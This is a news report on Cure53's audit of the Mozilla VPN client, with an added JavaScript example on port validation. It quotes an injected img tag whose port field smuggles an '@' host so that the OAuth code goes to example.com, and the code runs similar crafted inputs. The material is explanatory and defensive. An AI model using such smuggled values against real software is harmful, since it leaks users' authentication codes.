Mozilla VPN client audit results published

Mozilla has announced the completion of an independent audit of the client software used to connect to the Mozilla VPN service. The audit analyzed the standalone client application, which is written using the Qt library and is available for Linux, macOS, Windows, Android and iOS. Mozilla VPN is powered by more than 400 servers of the Swedish VPN provider Mullvad, located in more than 30 countries. Connections to the VPN service are made using the WireGuard protocol.

The audit was performed by Cure53, which has previously audited the NTPsec, SecureDrop, Cryptocat, F-Droid and Dovecot projects. It covered a review of the source code and included testing to identify potential vulnerabilities (cryptography-related issues were not considered). During the audit, 16 security issues were identified: 8 were recommendations, 5 were assigned a low severity level, two a medium level, and one a high level.

However, only one issue, of medium severity, was classified as a vulnerability, since it was the only one that was exploitable. This issue leaked information about VPN usage through the captive portal detection code, which sent direct unencrypted HTTP requests outside the VPN tunnel, exposing the user's primary IP address if an attacker is able to control transit traffic. The problem is resolved by disabling captive portal detection mode in the settings.

The second medium-severity issue is a lack of proper sanitization of non-numeric values in the port number, which allows OAuth authentication parameters to leak when the port number is replaced with a string such as "[email protected]". This results in the insertion of the tag <img src="http://127.0.0.1:[email protected]/?code=..." alt="">, which accesses example.com instead of 127.0.0.1.
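The port-sanitization issue above, as an added example that is not code from Mozilla, Cure53 or the audit report: it compares string concatenation of an unvalidated port with strict validation plus a post-parse host check, using the URL parser that browsers apply to an img src. The function names are hypothetical, and the sample port strings, including "8080@example.com", are constructed because the page's own value is redacted.

```javascript
// Added example; function names are hypothetical, inputs are constructed.

// Accept only 1-5 ASCII digits in the range 1..65535.
function parseLoopbackPort(raw) {
  if (typeof raw !== "string" || !/^[0-9]{1,5}$/.test(raw)) return null;
  const port = Number(raw);
  return port >= 1 && port <= 65535 ? port : null;
}

// Unsafe pattern: the raw value is concatenated straight into the URL.
function naiveCallbackUrl(rawPort, code) {
  return "http://127.0.0.1:" + rawPort + "/?code=" + encodeURIComponent(code);
}

// Host a WHATWG URL parser would contact, or null if the URL is unparsable.
function effectiveHost(urlString) {
  try { return new URL(urlString).hostname; } catch (e) { return null; }
}

// Hardened pattern: validate first, build with the URL API, re-check the host.
function buildCallbackUrl(rawPort, code) {
  const port = parseLoopbackPort(rawPort);
  if (port === null) throw new RangeError("port must be an integer 1-65535");
  const url = new URL("http://127.0.0.1/");
  url.port = String(port);
  url.searchParams.set("code", code);
  if (url.hostname !== "127.0.0.1" || url.username || url.password) {
    throw new Error("callback host changed after parsing");
  }
  return url.href;
}

// Constructed sample inputs; the last one uses non-ASCII digits.
const samples = ["8080", "8080@example.com", "80 80", "0", "65536", "٨٠٨٠"];
for (const s of samples) {
  const naiveHost = effectiveHost(naiveCallbackUrl(s, "SAMPLE"));
  let hardened;
  try { hardened = buildCallbackUrl(s, "SAMPLE"); }
  catch (e) { hardened = "rejected (" + e.message + ")"; }
  console.log(JSON.stringify(s), "| naive host:", naiveHost, "| hardened:", hardened);
}
```

With the "@" input, everything before the "@" is parsed as userinfo, so the concatenated URL resolves to example.com while the hardened builder rejects the value before any URL is formed.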

The third issue, marked as dangerous, allows any local application to access the VPN client without authentication through a WebSocket bound to localhost. As an example, it is shown that, with the VPN client running, any site could arrange for a screenshot to be created and sent by generating the screen_capture event. The issue is not classified as a vulnerability, since the WebSocket was used only in internal test builds, and use of this communication channel was planned only for the future, to enable interaction with a browser add-on.

Source: opennet.ru
